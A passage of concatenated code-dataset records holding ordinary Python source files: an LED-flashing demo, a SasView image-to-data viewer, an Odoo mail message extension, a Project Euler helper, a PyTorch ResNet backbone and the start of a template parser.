range(0, 5):\n #For each pin defined in pins\n for pin in pins:\n #Turn the LED on\n GPIO.output(pin, True)\n #Wait for 0.05s\n sleep(0.05)\n #Trun off the LED\n GPIO.output(pin, False)\n\n#Flash LEDs in sequence then all at once\ndef chaseFlash():\n #Twice...\n for i in range(0, 2):\n #Flash LEDs in sequence two times\n for i in range(0, 2):\n #for each pin defined in pins\n for pin in pins:\n #Turn on the LED\n GPIO.output(pin, True)\n #Wait for 0.25s\n sleep(0.25)\n\n #Flash all LEDs twice\n for i in range(0, 2):\n #Turn off all LEDs\n for pin in pins:\n GPIO.output(pin, False)\n #Wait for 0.5s \n sleep(0.5)\n #Turn on all LEDs\n for pin in pins:\n GPIO.output(pin, True)\n\n #Wait 0.5s\n sleep(0.5)\n\n #Turn off all LEDs\n for pin in pins:\n GPIO.output(pin, False)\n\ntry:\n #Main loop\n while True:\n\n #Generate a random integer\n selection = randint(0, 2)\n\n #If the random number equals 0\n if selection == 0:\n #Run the function to flash all LEDs\n allFlash()\n\n #If the random number equals 1\n elif selection == 1:\n #Run the function to flash LEDs in sequence\n chaseLights()\n\n #If the random number equals 2\n elif selection == 2:\n #Run the function to flash LEDs in sequence then all together.\n chaseFlash()\n\n #If the random number equals anything else\n else:\n #Restart the loop\n pass\n\n#If ctrl+c is pressed\nexcept KeyboardInterrupt:\n #Clear all GPIO settings\n GPIO.cleanup()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"296121331","text":"\n\nimport os\nimport sys\nimport wx\nimport numpy as np\nimport matplotlib\nmatplotlib.interactive(False)\n#Use the WxAgg back end. The Wx one takes too long to render\nmatplotlib.use('WXAgg')\nfrom sas.sasgui.guiframe.local_perspectives.plotting.SimplePlot import PlotFrame\n#import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport matplotlib.colors as colors\nfrom sas.sasgui.guiframe.events import StatusEvent\nfrom sas.sasgui.perspectives.calculator.calculator_widgets import InputTextCtrl\nfrom sas.sascalc.dataloader.data_info import Data2D\nfrom sas.sascalc.dataloader.data_info import Detector\nfrom sas.sascalc.dataloader.manipulations import reader2D_converter\nfrom sas.sasgui.guiframe.documentation_window import DocumentationWindow\n\n_BOX_WIDTH = 60\nIS_WIN = True\nif sys.platform.count(\"win32\") > 0:\n _DIALOG_WIDTH = 400\nelse:\n _DIALOG_WIDTH = 480\n IS_WIN = False\n\nclass ImageView:\n \"\"\"\n Open a file dialog to allow the user to select a given file.\n Display the loaded data if available.\n \"\"\"\n def __init__(self, parent=None):\n \"\"\"\n Init\n \"\"\"\n self.parent = parent\n\n def load(self):\n \"\"\"\n load image files\n \"\"\"\n parent = self.parent\n if parent is None:\n location = os.getcwd()\n else:\n location = parent._default_save_location\n path_list = self.choose_data_file(location=location)\n if path_list is None:\n return\n if len(path_list) >= 0 and path_list[0] is not None:\n if parent is not None:\n parent._default_save_location = os.path.dirname(path_list[0])\n err_msg = ''\n for file_path in path_list:\n basename = os.path.basename(file_path)\n _, extension = os.path.splitext(basename)\n try:\n # Note that matplotlib only reads png natively.\n # Any other formats (tiff, jpeg, etc) are passed\n # to PIL which seems to have a problem in version\n # 1.1.7 that causes a close error which shows up in \n # the log file. 
This does not seem to have any adverse\n # effects. PDB --- September 17, 2017.\n img = mpimg.imread(file_path)\n is_png = extension.lower() == '.png'\n plot_frame = ImageFrame(parent, -1, basename, img)\n plot_frame.Show(False)\n ax = plot_frame.plotpanel\n if not is_png:\n ax.subplot.set_ylim(ax.subplot.get_ylim()[::-1])\n ax.subplot.set_xlabel('x [pixel]')\n ax.subplot.set_ylabel('y [pixel]')\n ax.figure.subplots_adjust(left=0.15, bottom=0.1,\n right=0.95, top=0.95)\n plot_frame.SetTitle('Picture -- %s --' % basename)\n plot_frame.Show(True)\n if parent is not None:\n parent.put_icon(plot_frame)\n except:\n err_msg += \"Failed to load '%s'.\\n\" % basename\n if err_msg:\n if parent is not None:\n wx.PostEvent(parent, StatusEvent(status=err_msg, info=\"error\"))\n else:\n print(err_msg)\n\n def choose_data_file(self, location=None):\n \"\"\"\n Open a file dialog to allow loading a file\n \"\"\"\n path = None\n if location is None:\n location = os.getcwd()\n wildcard=\"Images (*.bmp;*.gif;*jpeg,*jpg;*.png;*tif;*.tiff)|*bmp;\\\n *.gif; *.jpg; *.jpeg;*png;*.png;*.tif;*.tiff|\"\\\n \"Bitmap (*.bmp)|*.bmp|\"\\\n \"GIF (*.gif)|*.gif|\"\\\n \"JPEG (*.jpg;*.jpeg)|*.jpg;*.jpeg|\"\\\n \"PNG (*.png)|*.png|\"\\\n \"TIFF (*.tif;*.tiff)|*.tif;*tiff|\"\\\n \"All Files (*.*)|*.*|\"\n\n dlg = wx.FileDialog(self.parent, \"Image Viewer: Choose an image file\",\n location, \"\", wildcard, style=wx.FD_OPEN\n | wx.FD_MULTIPLE)\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPaths()\n else:\n return None\n dlg.Destroy()\n return path\n\nclass ImageFrame(PlotFrame):\n \"\"\"\n Frame for simple plot\n \"\"\"\n def __init__(self, parent, id, title, image=None, scale='log_{10}',\n size=wx.Size(550, 470)):\n \"\"\"\n comment\n :Param data: image array got from imread() of matplotlib [narray]\n :param parent: parent panel/container\n \"\"\"\n # Initialize the Frame object\n PlotFrame.__init__(self, parent, id, title, scale, size,\n show_menu_icons=False)\n self.parent = parent\n self.data = image\n self.file_name = title\n\n menu = wx.Menu()\n id = wx.NewId()\n item = wx.MenuItem(menu, id, \"&Convert to Data\")\n menu.AppendItem(item)\n wx.EVT_MENU(self, id, self.on_set_data)\n self.menu_bar.Append(menu, \"&Image\")\n\n menu_help = wx.Menu()\n id = wx.NewId()\n item = wx.MenuItem(menu_help, id, \"&HowTo\")\n menu_help.AppendItem(item)\n wx.EVT_MENU(self, id, self.on_help)\n self.menu_bar.Append(menu_help, \"&Help\")\n\n self.SetMenuBar(self.menu_bar)\n self.im_show(image)\n\n def on_set_data(self, event):\n \"\"\"\n Rescale the x y range, make 2D data and send it to data explore\n \"\"\"\n title = self.file_name\n self.panel = SetDialog(parent=self, title=title, image=self.data)\n self.panel.ShowModal()\n\n def on_help(self, event):\n \"\"\"\n Bring up Image Viewer Documentation from the image viewer window\n whenever the help menu item \"how to\" is clicked. 
Calls\n DocumentationWindow with the path of the location within the\n documentation tree (after /doc/ ....\".\n\n :param evt: Triggers on clicking \"how to\" in help menu\n \"\"\"\n\n _TreeLocation = \"user/sasgui/perspectives/calculator/\"\n _TreeLocation += \"image_viewer_help.html\"\n _doc_viewer = DocumentationWindow(self, -1, _TreeLocation, \"\",\n \"Image Viewer Help\")\n\n\nclass SetDialog(wx.Dialog):\n \"\"\"\n Dialog for Data Set\n \"\"\"\n def __init__(self, parent, id= -1, title=\"Convert to Data\", image=None,\n size=(_DIALOG_WIDTH, 270)):\n wx.Dialog.__init__(self, parent, id, title, size)\n # parent\n self.parent = parent\n self.base = parent.parent\n self.title = title\n self.image = np.array(image)\n self.z_ctrl = None\n self.xy_ctrls = []\n self.is_png = self._get_is_png()\n self._build_layout()\n my_title = \"Convert Image to Data - %s -\" % self.title\n self.SetTitle(my_title)\n self.SetSize(size)\n\n def _get_is_png(self):\n \"\"\"\n Get if the image file is png\n \"\"\"\n _, extension = os.path.splitext(self.title)\n return extension.lower() == '.png'\n\n def _build_layout(self):\n \"\"\"\n Layout\n \"\"\"\n vbox = wx.BoxSizer(wx.VERTICAL)\n zbox = wx.BoxSizer(wx.HORIZONTAL)\n xbox = wx.BoxSizer(wx.HORIZONTAL)\n ybox = wx.BoxSizer(wx.HORIZONTAL)\n btnbox = wx.BoxSizer(wx.VERTICAL)\n\n sb_title = wx.StaticBox(self, -1, 'Transform Axes')\n boxsizer = wx.StaticBoxSizer(sb_title, wx.VERTICAL)\n z_title = wx.StaticText(self, -1, 'z values (range: 0 - 255) to:')\n ztime_title = wx.StaticText(self, -1, 'z *')\n x_title = wx.StaticText(self, -1, 'x values from pixel # to:')\n xmin_title = wx.StaticText(self, -1, 'xmin:')\n xmax_title = wx.StaticText(self, -1, 'xmax:')\n y_title = wx.StaticText(self, -1, 'y values from pixel # to:')\n ymin_title = wx.StaticText(self, -1, 'ymin: ')\n ymax_title = wx.StaticText(self, -1, 'ymax:')\n z_ctl = InputTextCtrl(self, -1, size=(_BOX_WIDTH , 20),\n style=wx.TE_PROCESS_ENTER)\n\n xmin_ctl = InputTextCtrl(self, -1, size=(_BOX_WIDTH, 20),\n style=wx.TE_PROCESS_ENTER)\n xmax_ctl = InputTextCtrl(self, -1, size=(_BOX_WIDTH, 20),\n style=wx.TE_PROCESS_ENTER)\n ymin_ctl = InputTextCtrl(self, -1, size=(_BOX_WIDTH, 20),\n style=wx.TE_PROCESS_ENTER)\n ymax_ctl = InputTextCtrl(self, -1, size=(_BOX_WIDTH, 20),\n style=wx.TE_PROCESS_ENTER)\n z_ctl.SetValue('1.0')\n xmin_ctl.SetValue('-0.3')\n xmax_ctl.SetValue('0.3')\n ymin_ctl.SetValue('-0.3')\n ymax_ctl.SetValue('0.3')\n z_ctl.Bind(wx.EVT_TEXT, self._on_z_enter)\n xmin_ctl.Bind(wx.EVT_TEXT, self._onparam)\n xmax_ctl.Bind(wx.EVT_TEXT, self._onparam)\n ymin_ctl.Bind(wx.EVT_TEXT, self._onparam)\n ymax_ctl.Bind(wx.EVT_TEXT, self._onparam)\n xbox.AddMany([(x_title , 0, wx.LEFT, 0),\n (xmin_title , 0, wx.LEFT, 10),\n (xmin_ctl , 0, wx.LEFT, 10),\n (xmax_title , 0, wx.LEFT, 10),\n (xmax_ctl , 0, wx.LEFT, 10)])\n ybox.AddMany([(y_title , 0, wx.LEFT, 0),\n (ymin_title , 0, wx.LEFT, 10),\n (ymin_ctl , 0, wx.LEFT, 10),\n (ymax_title , 0, wx.LEFT, 10),\n (ymax_ctl , 0, wx.LEFT, 10)])\n zbox.AddMany([(z_title , 0, wx.LEFT, 0),\n (ztime_title, 0, wx.LEFT, 10),\n (z_ctl , 0, wx.LEFT, 7),\n ])\n msg = \"The data rescaled will show up in the Data Explorer. \\n\"\n msg += \"*Note: Recommend to use an image with 8 bit Grey \\n\"\n msg += \" scale (and with No. 
of pixels < 300 x 300).\\n\"\n msg += \" Otherwise, z = 0.299R + 0.587G + 0.114B.\"\n note_txt = wx.StaticText(self, -1, msg)\n note_txt.SetForegroundColour(\"black\")\n hbox = wx.BoxSizer(wx.HORIZONTAL)\n okButton = wx.Button(self, -1, 'OK')\n okButton.Bind(wx.EVT_BUTTON, self.on_set)\n cancelButton = wx.Button(self, -1, 'Cancel')\n cancelButton.Bind(wx.EVT_BUTTON, self.OnClose)\n btnbox.Add(okButton, 0, wx.LEFT | wx.BOTTOM, 5)\n btnbox.Add(cancelButton, 0, wx.LEFT | wx.TOP, 5)\n hbox.Add(note_txt, 0, wx.LEFT, 5)\n hbox.Add(btnbox, 0, wx.LEFT, 15)\n vbox.Add((10, 15))\n boxsizer.Add(xbox, 1, wx.LEFT | wx.BOTTOM, 5)\n boxsizer.Add(ybox, 1, wx.LEFT | wx.BOTTOM, 5)\n boxsizer.Add(zbox, 1, wx.LEFT | wx.BOTTOM, 5)\n vbox.Add(boxsizer, 0, wx.LEFT, 20)\n vbox.Add(hbox, 0, wx.LEFT | wx.TOP, 15)\n okButton.SetFocus()\n # set sizer\n self.SetSizer(vbox)\n #pos = self.parent.GetPosition()\n #self.SetPosition(pos)\n self.z_ctrl = z_ctl\n self.xy_ctrls = [[xmin_ctl, xmax_ctl], [ymin_ctl, ymax_ctl]]\n\n def _onparamEnter(self, event=None):\n \"\"\"\n By pass original txtcrl binding\n \"\"\"\n pass\n\n def _onparam(self, event=None):\n \"\"\"\n Set to default\n \"\"\"\n item = event.GetEventObject()\n self._check_ctrls(item)\n\n def _check_ctrls(self, item, is_button=False):\n \"\"\"\n \"\"\"\n flag = True\n item.SetBackgroundColour(\"white\")\n try:\n val = float(item.GetValue())\n if val < -10.0 or val > 10.0:\n item.SetBackgroundColour(\"pink\")\n item.Refresh()\n flag = False\n except:\n item.SetBackgroundColour(\"pink\")\n item.Refresh()\n flag = False\n if not flag and is_button:\n err_msg = \"The allowed range of the min and max values are \\n\"\n err_msg += \"between -10 and 10.\"\n if self.base is not None:\n wx.PostEvent(self.base, StatusEvent(status=err_msg,\n info=\"error\"))\n else:\n print(err_msg)\n return flag\n\n def _on_z_enter(self, event=None):\n \"\"\"\n On z factor enter\n \"\"\"\n item = event.GetEventObject()\n self._check_z_ctrl(item)\n\n def _check_z_ctrl(self, item, is_button=False):\n \"\"\"\n \"\"\"\n flag = True\n item.SetBackgroundColour(\"white\")\n try:\n val = float(item.GetValue())\n if val <= 0:\n item.SetBackgroundColour(\"pink\")\n item.Refresh()\n flag = False\n except:\n item.SetBackgroundColour(\"pink\")\n item.Refresh()\n flag = False\n if not flag and is_button:\n err_msg = \"The z scale value should be larger than 0.\"\n if self.base is not None:\n wx.PostEvent(self.base, StatusEvent(status=err_msg,\n info=\"error\"))\n else:\n print(err_msg)\n return flag\n\n def on_set(self, event):\n \"\"\"\n Set image as data\n \"\"\"\n event.Skip()\n # Check the textctrl values\n for item_list in self.xy_ctrls:\n for item in item_list:\n if not self._check_ctrls(item, True):\n return\n if not self._check_z_ctrl(self.z_ctrl, True):\n return\n try:\n image = self.image\n xmin = float(self.xy_ctrls[0][0].GetValue())\n xmax = float(self.xy_ctrls[0][1].GetValue())\n ymin = float(self.xy_ctrls[1][0].GetValue())\n ymax = float(self.xy_ctrls[1][1].GetValue())\n zscale = float(self.z_ctrl.GetValue())\n self.convert_image(image, xmin, xmax, ymin, ymax, zscale)\n except:\n err_msg = \"Error occurred while converting Image to Data.\"\n if self.base is not None:\n wx.PostEvent(self.base, StatusEvent(status=err_msg,\n info=\"error\"))\n else:\n print(err_msg)\n\n self.OnClose(event)\n\n def convert_image(self, rgb, xmin, xmax, ymin, ymax, zscale):\n \"\"\"\n Convert image to data2D\n \"\"\"\n x_len = len(rgb[0])\n y_len = len(rgb)\n x_vals = np.linspace(xmin, xmax, num=x_len)\n y_vals 
= np.linspace(ymin, ymax, num=y_len)\n # Instantiate data object\n output = Data2D()\n output.filename = os.path.basename(self.title)\n output.id = output.filename\n detector = Detector()\n detector.pixel_size.x = None\n detector.pixel_size.y = None\n # Store the sample to detector distance\n detector.distance = None\n output.detector.append(detector)\n # Initiazed the output data object\n output.data = zscale * self.rgb2gray(rgb)\n output.err_data = np.zeros([x_len, y_len])\n output.mask = np.ones([x_len, y_len], dtype=bool)\n output.xbins = x_len\n output.ybins = y_len\n output.x_bins = x_vals\n output.y_bins = y_vals\n output.qx_data = np.array(x_vals)\n output.qy_data = np.array(y_vals)\n output.xmin = xmin\n output.xmax = xmax\n output.ymin = ymin\n output.ymax = ymax\n output.xaxis('\\\\rm{Q_{x}}', '\\AA^{-1}')\n output.yaxis('\\\\rm{Q_{y}}', '\\AA^{-1}')\n # Store loading process information\n output.meta_data['loader'] = self.title.split('.')[-1] + \"Reader\"\n output.is_data = True\n output = reader2D_converter(output)\n if self.base is not None:\n data = self.base.create_gui_data(output, self.title)\n self.base.add_data({data.id:data})\n\n def rgb2gray(self, rgb):\n \"\"\"\n RGB to Grey\n \"\"\"\n if self.is_png:\n # png image limits: 0 to 1, others 0 to 255\n #factor = 255.0\n rgb = rgb[::-1]\n if rgb.ndim == 2:\n grey = np.rollaxis(rgb, axis=0)\n else:\n red, green, blue = np.rollaxis(rgb[..., :3], axis= -1)\n grey = 0.299 * red + 0.587 * green + 0.114 * blue\n max_i = rgb.max()\n factor = 255.0 / max_i\n grey *= factor\n return np.array(grey)\n\n def OnClose(self, event):\n \"\"\"\n Close event\n \"\"\"\n # clear event\n event.Skip()\n self.Destroy()\n\nif __name__ == \"__main__\":\n app = wx.App()\n ImageView(None).load()\n app.MainLoop()\n","sub_path":"jhub37_mantid_baseline/sasview-5.0.3/src/sas/sasgui/perspectives/calculator/image_viewer.py","file_name":"image_viewer.py","file_ext":"py","file_size_in_byte":16472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"472524349","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\nfrom bs4 import BeautifulSoup\n# class jj_mail(models.Model):\n# _name = 'jj_mail.jj_mail'\n\n# name = fields.Char()\n# value = fields.Integer()\n# value2 = fields.Float(compute=\"_value_pc\", store=True)\n# description = fields.Text()\n#\n# @api.depends('value')\n# def _value_pc(self):\n# self.value2 = float(self.value) / 100\n\n\nclass MailMessageExtend(models.Model):\n\n _inherit = 'mail.message'\n\n @api.depends('is_show')\n @api.model\n def get_is_show(self):\n\n\n pid = self.author_id.id\n pids = [p.id for p in self.partner_ids]\n if pid == self.env.user.partner_id.id or pid in pids:\n self.is_show = True\n else:\n self.is_show = False\n\n\n\n is_show = fields.Boolean(compute=get_is_show)\n\n @api.depends('body_plain_slug', 'body')\n @api.model\n def compute_body_plain(self):\n body = self.body\n soup = BeautifulSoup(body, 'html.parser')\n plain = soup.get_text()\n if soup and plain:\n if len(plain) > 20:\n self.body_plain_slug = plain[0:20]\n else:\n self.body_plain_slug = plain\n else:\n self.body_plain_slug = ''\n\n body_plain_slug = fields.Char(string='消息', compute=compute_body_plain)\n\n @api.multi\n def read(self, fields=None, load='_classic_read'):\n \"\"\"\n 获取审阅状态,并更新\n :param fields:\n :param load:\n :return:\n \"\"\"\n # 获取师徒读取的值\n k = 'is_show'\n\n f = super(MailMessageExtend, self).read(fields=fields, load=load)\n index = 0\n datas = []\n\n for v in f:\n\n 
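`rgb2gray` above applies the ITU-R BT.601 luma weights (0.299R + 0.587G + 0.114B). A minimal numpy sketch on a synthetic image (shape and values invented for illustration):

```python
import numpy as np

rgb = np.zeros((2, 2, 3))
rgb[..., 0] = 1.0  # a pure-red test image
# Split channels the same way the viewer does, then weight them.
red, green, blue = np.rollaxis(rgb[..., :3], axis=-1)
grey = 0.299 * red + 0.587 * green + 0.114 * blue
print(grey)  # every pixel is 0.299
```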
if k in v.keys() and not v[k]:\n datas.append(v)\n for d in datas:\n f.remove(d)\n\n return f\n\n @api.model\n def get_messages(self, domain, limit=20):\n fields = [\n 'id', 'body', 'date', 'author_id', 'email_from', # base message fields\n 'message_type', 'subtype_id', 'subject', # message specific\n 'model', 'res_id', 'record_name', # document related\n 'channel_ids', 'partner_ids', # recipients\n 'needaction_partner_ids', # list of partner ids for whom the message is a needaction\n 'starred_partner_ids', # list of partner ids for whom the message is starred\n ]\n\n p = self.env.cr.execute('SELECT * FROM mail_message')\n\n\n f = self.sudo().search(domain, limit=limit).message_format()\n\n k = 'is_show'\n datas = []\n\n\n return f\n\n @api.model\n def message_fetch(self, domain, limit=20):\n\n\n s = super(MailMessageExtend, self).search(domain, limit=limit).message_format()\n\n return s","sub_path":"jj_mail/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"44160335","text":"###################################\n#\n# Problem 20 Project Euler\n#\n###################################\n\ndef sumDigits(num,power = 1):\n\tnumStr = str(num**power)\n\tsumDigits = 0\n\tfor a in range(len(numStr)):\n\t\tsumDigits += int(numStr[a])\n\treturn sumDigits\n\ndef factorial(num):\n\tproduct = 1\n\twhile num >1:\n\t\tproduct *= num\n\t\tnum += -1\n\treturn product\n","sub_path":"Problem020.py","file_name":"Problem020.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16758604","text":"# !/usr/bin/env python\r\n# -- coding: utf-8 --\r\n# @Time : 2020/11/3 9:02\r\n# @Author : liumin\r\n# @File : resnet.py\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.utils import model_zoo\r\nfrom torchvision.models.resnet import resnet18, resnet34, resnet50, resnet101, resnet152\r\n\r\n\"\"\"\r\n Deep Residual Learning for Image Recognition\r\n https://arxiv.org/pdf/1512.03385.pdf\r\n\"\"\"\r\n\r\nmodel_urls = {\r\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\r\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\r\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\r\n 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\r\n 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\r\n}\r\n\r\n\r\nclass ResNet(nn.Module):\r\n\r\n def __init__(self, subtype='resnet50', out_stages=[2, 3, 4], output_stride = 32, backbone_path=None, pretrained = False):\r\n super(ResNet, self).__init__()\r\n self.subtype = subtype\r\n self.out_stages = out_stages\r\n self.output_stride = output_stride # 8, 16, 32\r\n self.backbone_path = backbone_path\r\n self.pretrained = pretrained\r\n\r\n if self.subtype == 'resnet18':\r\n backbone = resnet18(self.pretrained)\r\n self.out_channels = [64, 64, 128, 256, 512]\r\n elif self.subtype == 'resnet34':\r\n backbone = resnet34(self.pretrained)\r\n self.out_channels = [64, 64, 128, 256, 512]\r\n elif self.subtype == 'resnet50':\r\n backbone = resnet50(self.pretrained)\r\n self.out_channels = [64, 256, 512, 1024, 2048]\r\n elif self.subtype == 'resnet101':\r\n backbone = resnet101(self.pretrained)\r\n self.out_channels = [64, 256, 512, 1024, 2048]\r\n elif self.subtype == 'resnet152':\r\n backbone = resnet152(self.pretrained)\r\n self.out_channels = 
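The two helpers in Problem020.py above combine as `sumDigits(factorial(100))` for Project Euler 20; a stdlib cross-check:

```python
import math

# Sum of the digits of 100! using the standard library instead of the hand-rolled loop.
print(sum(int(c) for c in str(math.factorial(100))))  # 648
```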
[64, 256, 512, 1024, 2048]\r\n else:\r\n raise NotImplementedError\r\n\r\n self.out_channels = [self.out_channels[ost] for ost in self.out_stages]\r\n\r\n self.conv1 = backbone.conv1\r\n self.bn1 = backbone.bn1\r\n self.relu = backbone.relu\r\n self.maxpool = backbone.maxpool\r\n self.layer1 = backbone.layer1\r\n self.layer2 = backbone.layer2\r\n self.layer3 = backbone.layer3\r\n self.layer4 = backbone.layer4\r\n\r\n if self.output_stride == 16:\r\n s3, s4, d3, d4 = (2, 1, 1, 2)\r\n elif self.output_stride == 8:\r\n s3, s4, d3, d4 = (1, 1, 2, 4)\r\n\r\n for n, m in self.layer3.named_modules():\r\n if 'conv1' in n and (subtype == 'resnet34' or subtype == 'resnet18'):\r\n m.dilation, m.padding, m.stride = (d3, d3), (d3, d3), (s3, s3)\r\n elif 'conv2' in n:\r\n m.dilation, m.padding, m.stride = (d3, d3), (d3, d3), (s3, s3)\r\n elif 'downsample.0' in n:\r\n m.stride = (s3, s3)\r\n\r\n if self.output_stride == 8 or self.output_stride == 16:\r\n for n, m in self.layer4.named_modules():\r\n if 'conv1' in n and (subtype == 'resnet34' or subtype == 'resnet18'):\r\n m.dilation, m.padding, m.stride = (d4, d4), (d4, d4), (s4, s4)\r\n elif 'conv2' in n:\r\n m.dilation, m.padding, m.stride = (d4, d4), (d4, d4), (s4, s4)\r\n elif 'downsample.0' in n:\r\n m.stride = (s4, s4)\r\n\r\n if self.pretrained:\r\n self.load_pretrained_weights()\r\n else:\r\n self.init_weights()\r\n\r\n\r\n def forward(self, x):\r\n x = self.maxpool(self.relu(self.bn1(self.conv1(x))))\r\n output = []\r\n for i in range(1, 5):\r\n res_layer = getattr(self, 'layer{}'.format(i))\r\n x = res_layer(x)\r\n if i in self.out_stages:\r\n output.append(x)\r\n\r\n return output if len(self.out_stages) > 1 else output[0]\r\n\r\n def freeze_bn(self):\r\n for layer in self.modules():\r\n if isinstance(layer, nn.BatchNorm2d):\r\n layer.eval()\r\n\r\n def freeze_stages(self, stage):\r\n if stage >= 0:\r\n self.bn1.eval()\r\n for m in [self.conv1, self.bn1]:\r\n for param in m.parameters():\r\n param.requires_grad = False\r\n for i in range(1, stage + 1):\r\n layer = getattr(self, 'layer{}'.format(i))\r\n layer.eval()\r\n for param in layer.parameters():\r\n param.requires_grad = False\r\n\r\n def init_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n nn.init.normal_(m.weight, std=0.001)\r\n if m.bias is not None:\r\n nn.init.constant_(m.bias, 0)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n nn.init.constant_(m.weight, 1)\r\n nn.init.constant_(m.bias, 0.0001)\r\n\r\n def load_pretrained_weights(self):\r\n url = model_urls[self.subtype]\r\n if url is not None:\r\n pretrained_state_dict = model_zoo.load_url(url)\r\n print('=> loading pretrained model {}'.format(url))\r\n self.load_state_dict(pretrained_state_dict, strict=False)\r\n elif self.backbone_path is not None:\r\n print('=> loading pretrained model {}'.format(self.backbone_path))\r\n self.load_state_dict(torch.load(self.backbone_path))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n model = ResNet('resnet50')\r\n print(model)\r\n\r\n input = torch.randn(1, 3, 224, 224)\r\n out = model(input)\r\n for o in out:\r\n print(o.shape)","sub_path":"src/models/backbones/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"524674548","text":"import string\r\n\r\nID_FIRST = frozenset(\"\".join((string.ascii_letters, \"_\")))\r\nID_REST = frozenset(\"\".join((string.ascii_letters, string.digits, \"_\")))\r\nKEYWORDS = frozenset((\"if\", 
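One subtlety in the `ResNet` block above: when `output_stride` is 32 (the default), `s3`/`d3` are never assigned, yet the `layer3` patch loop still runs and would raise `NameError` on the first `conv2` it matches. A hedged sketch of a guard (it mirrors the structure above but is not the file's exact code):

```python
def stride_dilation_params(output_stride):
    """Return (s3, s4, d3, d4) for dilated variants, or None for the plain backbone."""
    if output_stride == 16:
        return (2, 1, 1, 2)
    if output_stride == 8:
        return (1, 1, 2, 4)
    return None  # output_stride == 32: no patching needed

params = stride_dilation_params(32)
if params is not None:
    s3, s4, d3, d4 = params
    # ... patch layer3/layer4 conv strides and dilations here ...
print(params)  # None, so the layer3/layer4 patch loops are skipped entirely
```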
\"not\"))\r\n(TKN_NAME, TKN_NUMBER, TKN_STRING, TKN_RELOP) = range(4)\r\n\r\nclass ConditionalTemplate (object):\r\n def __init__(self, pattern):\r\n self.vars = set()\r\n self.look = None\r\n self.pattern = pattern\r\n self.backouts = []\r\n self.pos = None\r\n self.len = len(self.pattern)\r\n self.last_match = None\r\n self._Next()\r\n self.template = self._Compile()\r\n self.vars = frozenset(self.vars)\r\n del self.look\r\n del self.pattern\r\n del self.backouts\r\n del self.pos\r\n del self.len\r\n del self.last_match\r\n \r\n def _Next(self):\r\n if self.pos is None:\r\n self.pos = 0\r\n elif self.pos < self.len:\r\n self.pos += 1\r\n if self.pos < self.len:\r\n self.look = self.pattern[self.pos]\r\n else:\r\n self.look = None\r\n \r\n def _SavePos(self):\r\n self.backouts.append(self.pos)\r\n \r\n def _RestorePos(self):\r\n self.pos = self.backouts.pop()\r\n if self.pos < self.len:\r\n self.look = self.pattern[self.pos]\r\n else:\r\n self.look = None\r\n \r\n def _KeepPos(self):\r\n self.backouts.pop()\r\n \r\n def _Match(self, token):\r\n if isinstance(token, basestring):\r\n self._SavePos()\r\n for i in xrange(len(token)):\r\n if self.look != token[i]:\r\n self._RestorePos()\r\n return False\r\n self._Next()\r\n self.last_match = token\r\n self._KeepPos()\r\n return True\r\n else:\r\n value = None\r\n if token == TKN_NAME:\r\n value = self._GetName()\r\n elif token == TKN_NUMBER:\r\n value = self._GetNumber()\r\n elif token == TKN_STRING:\r\n value = self._GetString()\r\n elif token == TKN_RELOP:\r\n value = self._GetRelationalOperator()\r\n if value is not None:\r\n self.last_match = value\r\n return value is not None\r\n \r\n def _Compile(self, nested=False):\r\n if nested:\r\n self._SavePos()\r\n if not self._Match(\"{\"):\r\n self._RestorePos()\r\n return None\r\n template = []\r\n templateString = []\r\n while self.look is not None:\r\n if self._Match(\"$$\"):\r\n templateString.append(\"$\")\r\n elif self._Match(\"${{\"):\r\n templateString.append(\"{{\")\r\n elif self._Match(\"$}}\"):\r\n templateString.append(\"}}\")\r\n elif self._Match(\"{\"):\r\n templateString.append(\"{{\")\r\n elif self._Match(\"}\"):\r\n if nested:\r\n break\r\n else:\r\n templateString.append(\"}}\")\r\n else:\r\n node = self._GetNode()\r\n if node is None:\r\n node = self.look\r\n self._Next()\r\n if isinstance(node, basestring):\r\n templateString.append(node)\r\n else:\r\n if len(templateString) > 0:\r\n template.append(u\"\".join(templateString))\r\n templateString = []\r\n template.append(node)\r\n if nested:\r\n if self.last_match == \"}\":\r\n self._KeepPos()\r\n else:\r\n self._RestorePos()\r\n return None\r\n if len(templateString) > 0:\r\n template.append(u\"\".join(templateString))\r\n return tuple(template)\r\n \r\n def _GetNode(self):\r\n self._SavePos()\r\n if not self._Match(\"$\"):\r\n self._RestorePos()\r\n return None\r\n elif self._Match(\"{\"):\r\n if not self._Match(TKN_NAME):\r\n self._RestorePos()\r\n return None\r\n name = self.last_match\r\n if not self._Match(\"}\"):\r\n self._RestorePos()\r\n return None\r\n elif self._Match(TKN_NAME):\r\n name = self.last_match\r\n else:\r\n self._RestorePos()\r\n return None\r\n if name in KEYWORDS and name != \"if\":\r\n self._RestorePos()\r\n return None\r\n if name != \"if\":\r\n self._KeepPos()\r\n self.vars.add(name)\r\n return u\"\".join((\"{\", name, \"}\"))\r\n condition = u\"\"\r\n conditional_vars = set()\r\n TrueTemplate = None\r\n FalseTemplate = None\r\n if not self._Match(\"(\"):\r\n self._RestorePos()\r\n return None\r\n 
